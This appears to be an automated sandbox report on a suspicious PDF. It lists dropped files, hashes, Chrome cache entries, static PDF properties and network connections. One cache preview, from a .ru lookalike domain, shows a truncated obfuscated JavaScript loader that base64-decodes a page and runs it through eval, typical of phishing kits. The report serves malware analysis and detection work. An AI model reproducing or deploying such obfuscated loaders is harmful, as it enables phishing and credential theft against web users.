                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Ul7H:Qw946cPbiOxDlbYnuRK7
                                                      MD5:6ACF536CAA530BD7E87A0531A50D3C51
                                                      SHA1:769B11420A27716BCDCB5ABE00664D856971E3BD
                                                      SHA-256:EB4A45263A920ECB06C00514F49E008D8B23CCFA912C10B127F6928D465AA258
                                                      SHA-512:75E030F286F39670C21FF9AE069EDB056517B1896B8B1E2EFCDDBA18DE6CB143EFB7DF52869BE47B15E58DFF46FF7D2C1C03A9D23BF5E248098B87811BED23BA
                                                      Malicious:false
                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.5./.0.3./.2.0.2.5. . .0.6.:.5.3.:.5.3. .=.=.=.....

                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\A913q1c4i_netyvb_3s4.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:PDF document, version 1.6, 0 pages
                                                      Category:dropped
                                                      Size (bytes):358
                                                      Entropy (8bit):5.056647537366864
                                                      Encrypted:false
                                                      SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOCLhiGi3rFhiGi3FCSyAAO:IngVMre9T0HQIDmy9g06JXilAnlAFlX
                                                      MD5:83251D0B9B5C49BE99DAEE6A38F74D0D
                                                      SHA1:3F05833D9911094C5A67A6559EB4C7D137DC676A
                                                      SHA-256:65AB907FFD1F0CCA5C1F2FA1B23D09A375FAFC22712BB8591B6EBB6E156D137D
                                                      SHA-512:358880D13CAEB93B2C31CF7BAF4A502CB4C6723E17A5BD310232DF039EE5B6048DDBFC6CAB8E0389C3FF5587896B3FCD7E466A1F9D872FFAEE19481DC16AA357
                                                      Malicious:false
                                                      Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<B0021A359EB4C4448BC8EC829A15295C><B0021A359EB4C4448BC8EC829A15295C>]>>..startxref..127..%%EOF..

                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-25 06-53-47-946.log

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:ASCII text, with very long lines (393)
                                                      Category:dropped
                                                      Size (bytes):16525
                                                      Entropy (8bit):5.338264912747007
                                                      Encrypted:false
                                                      SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                      MD5:128A51060103D95314048C2F32A15C66
                                                      SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                      SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                      SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                      Malicious:false
                                                      Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15114
                                                      Entropy (8bit):5.373540790225565
                                                      Encrypted:false
                                                      SSDEEP:384:0+4v9PILHwtT7wAv1FlktHuznIwPVqiNsT2KwI4/khBPENuBRxbpUnU98esNC/fi:lq9
                                                      MD5:EE0864254284A79C097CA7C96A9234FE
                                                      SHA1:CA0C90296191A89669F00155B1130ADCD4B9F457
                                                      SHA-256:0954D27215BC8D8D0AD381D4672A16C462E796CAAB41D7C37EAAC671F79F5C9D
                                                      SHA-512:A2B9C657A0DC029B02E28DB3ACD8DA2EC0A0516AE5E91337D933107BC6B442F18132DB63A15FCA5123F51135A8695E2D0FCB688E90867CA25D88DA04FA6BC969
                                                      Malicious:false
                                                      Preview:SessionID=19aa5f2b-f972-4f63-a1bb-75618ed23a56.1742900027985 Timestamp=2025-03-25T06:53:47:985-0400 ThreadID=2868 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=19aa5f2b-f972-4f63-a1bb-75618ed23a56.1742900027985 Timestamp=2025-03-25T06:53:47:986-0400 ThreadID=2868 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=19aa5f2b-f972-4f63-a1bb-75618ed23a56.1742900027985 Timestamp=2025-03-25T06:53:47:986-0400 ThreadID=2868 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=19aa5f2b-f972-4f63-a1bb-75618ed23a56.1742900027985 Timestamp=2025-03-25T06:53:47:986-0400 ThreadID=2868 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=19aa5f2b-f972-4f63-a1bb-75618ed23a56.1742900027985 Timestamp=2025-03-25T06:53:47:987-0400 ThreadID=2868 Component=ngl-lib_NglAppLib Description="SetConf

                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):29752
                                                      Entropy (8bit):5.402454007982671
                                                      Encrypted:false
                                                      SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbqFFRqhgReFU1cbYIg6cb9:V3fOCIdJDesFFRqhgRoU4gd
                                                      MD5:4B5F008365016AC69C8B2D07678955DF
                                                      SHA1:E3700EA2373D2AE8FB3DDCB6448040AE8429AE34
                                                      SHA-256:204E5E9592564736AF7E4C4D9800293202FEA9B3FEDFCB44FF594B5F705D9E05
                                                      SHA-512:ABBB99D620CA461DE5CFA6D53CD13755AB44C5ACC4AD1DD9A0BBD7603548BB6ABA556D99B91A2D42A6715C091280D35C65FF6DB0B24D36D33787666E1E13186F
                                                      Malicious:false
                                                      Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\0fbbbae6-8935-4b4f-9789-280925f7281b.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                      Category:dropped
                                                      Size (bytes):386528
                                                      Entropy (8bit):7.9736851559892425
                                                      Encrypted:false
                                                      SSDEEP:6144:rBgI81ReWQ53+sQ3POSTJJJJEQ6T9UkRm1XX/FLYVbxrr/IxktOQZ1mau4yBwsOo:r+Tegs6lTJJJJv+9UZd1ybxrr/IxkB1m
                                                      MD5:774036904FF86EB19FCE18B796528E1E
                                                      SHA1:2BA0EBF3FC7BEF9EF5BFAD32070BD3C785904E16
                                                      SHA-256:D2FC8EA3DDD3F095F7A469927179B408102471627C91275EDB4D7356F8E453AD
                                                      SHA-512:9E9662EA15AE3345166C1E51235CDCE3123B27848E4A4651CC4D2173BDD973E4AD2F8994EFF34A221A9F07AA676F52BEB6D90FF374F6CCB0D06FA39C3EFE6B31
                                                      Malicious:false
                                                      Preview:...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..

                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\22223f24-49c2-4213-b422-9546c29f8625.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                      Category:dropped
                                                      Size (bytes):1419751
                                                      Entropy (8bit):7.976496077007677
                                                      Encrypted:false
                                                      SSDEEP:24576:/xTwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG/WLxYGZN3mlind9i4ufFXpAXkru
                                                      MD5:62F2E9F22B4021BA764763F066157442
                                                      SHA1:0BBCDDCCA2B7342980503F1522E9249B077DED4C
                                                      SHA-256:747B773557070E01063EDCDF20C3DA8DD01599EF5EE5E5320BA7328DFDB2E721
                                                      SHA-512:0D58BA35B2BBE548612357D9252FD87DDDC939B346DC666778CCE2C44E60F4A58434A42FDA5BDC7DF9552999D29ACD35E2F77FC5BD3D423B336F224D157F00A6
                                                      Malicious:false
                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\f6c02f99-5cee-46a9-9311-f32d55d1daa7.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                      Category:dropped
                                                      Size (bytes):1407294
                                                      Entropy (8bit):7.97605879016224
                                                      Encrypted:false
                                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                      MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                      SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                      SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                      SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                      Malicious:false
                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\fa98da7e-84d2-4980-b4ac-caf1daf1949d.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                      Category:dropped
                                                      Size (bytes):758601
                                                      Entropy (8bit):7.98639316555857
                                                      Encrypted:false
                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                      MD5:3A49135134665364308390AC398006F1
                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                      Malicious:false
                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                      Chrome Cache Entry: 182

                                                      Download File
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16
                                                      Entropy (8bit):3.5
                                                      Encrypted:false
                                                      SSDEEP:3:H+rYn:D
                                                      MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                      SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                      SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                      SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                      Malicious:false
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCRFkk2auY0aYEgUNNzCpMCFrRKeonvwSmA==?alt=proto
                                                      Preview:CgkKBw03MKkwGgA=

                                                      Chrome Cache Entry: 183

                                                      Download File
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65360)
                                                      Category:downloaded
                                                      Size (bytes):777059
                                                      Entropy (8bit):3.360826458858658
                                                      Encrypted:false
                                                      SSDEEP:768:riddFTv4Of8YhbSt4iddFTv4Of8YhbStSLkK9ESLkK9E3:udbTg1tTdbTg1tSLBuSLBu3
                                                      MD5:191369D96901C865D92BCB5576F6D839
                                                      SHA1:D09CF1758E700E7D562AD0816D25271B8A0E2904
                                                      SHA-256:33DDB0CFEA6D2455F99CD491EA94B77AA799CC49FAAD785A2765E482FC0F3382
                                                      SHA-512:109384F71F2C6447B21387DE4493A3331D7476156CA6C338E4A67419561D3CFAD3FC87B7790CC9FA64AFA6A3A03BCCFB0FE515DEB613CCA72F7169464C48DD99
                                                      Malicious:false
                                                      URL:https://uz5k.vsmaemhjvk.ru/vHFigT/
                                                      Preview:<script>.kspgwaTLCN = atob("aHR0cHM6Ly9Pb1lJLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");.CWZErfFggr = atob("bm9tYXRjaA==");.BmnnpSVaor = atob("d3JpdGU=");.if(kspgwaTLCN == CWZErfFggr){.document[BmnnpSVaor](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBucXZLbXdVSFFrID0gewogIGdldChHa2VneEtCR2hRLCBZUGxDZVl6eHhoKSB7CiAgICBjb25zdCBJZlBtV2JzTGRzID0gWy4uLllQbENlWXp4eGhdCiAgICAgIC5tYXAoZ3NOU1dvZENWdSA9PiArKCfvvqAnID4gZ3NOU1dvZENWdSkpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IFNHZ1ZYbldIR3ggPSBJZlBtV2JzTGRzLnJlcGxhY2UoLy57OH0vZywgVkRWVVFYTnhVVSA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KFZEVlVRWE54VVUsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKFNHZ1ZYbldIR3gpOwo

                                                      Chrome Cache Entry: 184

                                                      Download File
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                      Chrome Cache Entry: 185

                                                      Download File
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (3051)
                                                      Category:downloaded
                                                      Size (bytes):3056
                                                      Entropy (8bit):5.8788825684359365
                                                      Encrypted:false
                                                      SSDEEP:48:v0YUcghk2KlgJXwiHV+s2b/uxB6MjxuSBFO8zkaWjfmtWXaZQoyVkyoN/Z6MARu1:sYqktloB2b/uxBvgSP3kLTm2a6LU/Z6w
                                                      MD5:1AC457937B59B4AB3D671297F428448B
                                                      SHA1:BA7BCE85FBB07AAA97769B899F239E1C60AC4141
                                                      SHA-256:A31010A962581B5AAB15AF338B48A4286EF4C7D2A8A21EFDD5316E6DB8E239CB
                                                      SHA-512:15F3A69588A5520F8CE057E82DDF30CDD367D0956B4A365624AD67D8C04CCFA12B02510B5D26A478E11977A1C3CEF3DE295002639AE379D5E197D74795C1A7B6
                                                      Malicious:false
                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                      Preview:)]}'.["",["walt disney world epcot fire","philadelphia eagles","green card holder ice detention","minecraft updates ghast","dq blizzards 85 cents","atlanta golf club tgl","travel warnings america","united airlines flight passport"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CggvbS8wNXRnMxINRm9vdGJhbGwgdGVhbTLaC2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFCQUNBTUFBQUNkdDRIc0FBQUF1bEJNVkVYLy8vOEFBQUNpcXEybnI3S3Fzclg3Ky9zQU16MzI5L2RkZW9EZDRPR2NwYWpxN08wQUpDNXllSG9BRWgvbTV1YVVuSjY2eE1ZQU1EelUydHpMejlGWlhWK0JpSXRVV0ZwQlJFVUFGeHUzdmI5aVoya2FHeHR6YzNNMU5UV3d1Yng2Z0lKVmNuaDlrSlFtVmw0QUtEYUVtSndBSUNVQURoQUFGaDhBUUVnNVhHT1NvcVpKYVc4Y0pTZGZYRnlKa1pTVmxKTWpPVDJ0cTZzQUFBNGFGQk1BS2pBcExTNXRob3ROUzBzbUpDTVBFQkFBSFNrQUNCZ2VURlExRXFWL0FBQURWRWxFUVZSWWhlMVZhNU9hU2hTMFowYVFsNENNZ0lEZ3JycUcxU3diemJMckkvLy9iMlVHOEY1VEJj

                                                      Static File Info

                                                      General

                                                      File type:PDF document, version 1.7
                                                      Entropy (8bit):7.996056446648237
                                                      TrID:
                                                      • Adobe Portable Document Format (5005/1) 100.00%
                                                      File name:PAD_[2025-03-24_120914].pdf
                                                      File size:129'496 bytes
                                                      MD5:e39a4016cd760a85e9d89cce8a671a26
                                                      SHA1:a2a3783575261cee4be15ad615edd9c00c20a435
                                                      SHA256:64950941c354bdbfca84606d3e07b59c58d348b9145e2ff6b7899e68a164886b
                                                      SHA512:1bcb54570d745bd3b940a76fe3588c1d43c5da530c2de643c041dd2f9e92e1e12b9a3805e952b61f0997af79e29cbfe1397ecdee21f8a41ca6b924b3f5e74b20
                                                      SSDEEP:3072:p+k2VK9CO9TJNeVzg5OIN8/olny7UkvQG7UTkd:MC9d9TJqU8Aly7Ukxr
                                                      TLSH:79C312ED336966A8E8BE8C08165D911863C2080B1E10B9D55BD44246F5DDEF0FD7BF0E
                                                      File Content Preview:%PDF-1.7.%.....2 0 obj.<<./Type /Catalog./Pages 4 0 R./Lang (en)./StructTreeRoot 5 0 R./MarkInfo 6 0 R./Metadata 7 0 R./ViewerPreferences 8 0 R./AcroForm 9 0 R.>>.endobj.7 0 obj.<<./Type /Metadata./Subtype /XML./Filter /FlateDecode./Length 495.>>.stream..

                                                      File Icon

                                                      Icon Hash:62cc8caeb29e8ae0

                                                      Static PDF Info

                                                      General

                                                      Header:%PDF-1.7
                                                      Total Entropy:7.996056
                                                      Total Bytes:129496
                                                      Stream Entropy:7.997268
                                                      Stream Bytes:127579
                                                      Entropy outside Streams:5.126613
                                                      Bytes outside Streams:1917
                                                      Number of EOF found:1
                                                      Bytes after EOF:
                                                      NameCount
                                                      obj17
                                                      endobj17
                                                      stream15
                                                      endstream15
                                                      xref0
                                                      trailer0
                                                      startxref1
                                                      /Page0
                                                      /Encrypt0
                                                      /ObjStm1
                                                      /URI0
                                                      /JS0
                                                      /JavaScript0
                                                      /AA0
                                                      /OpenAction0
                                                      /AcroForm1
                                                      /JBIG2Decode0
                                                      /RichMedia0
                                                      /Launch0
                                                      /EmbeddedFile0
                                                      IDDHASHMD5Preview
                                                      530000000000000000e85832b485e18ba58b5024dd55f26d82
                                                      55293979476d6551492547a0578d429a03acf73218099fa13c

                                                      Network Behavior

                                                      Download Network PCAP: filteredfull

                                                      Network Port Distribution

                                                      • Total Packets: 267
                                                      • 443 (HTTPS)
                                                      • 80 (HTTP)
                                                      • 53 (DNS)
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 25, 2025 11:53:43.349719048 CET49672443192.168.2.6204.79.197.203
                                                      Mar 25, 2025 11:53:43.661881924 CET49672443192.168.2.6204.79.197.203
                                                      Mar 25, 2025 11:53:44.271250010 CET49672443192.168.2.6204.79.197.203
                                                      Mar 25, 2025 11:53:45.474957943 CET49672443192.168.2.6204.79.197.203
                                                      Mar 25, 2025 11:53:47.880652905 CET49672443192.168.2.6204.79.197.203
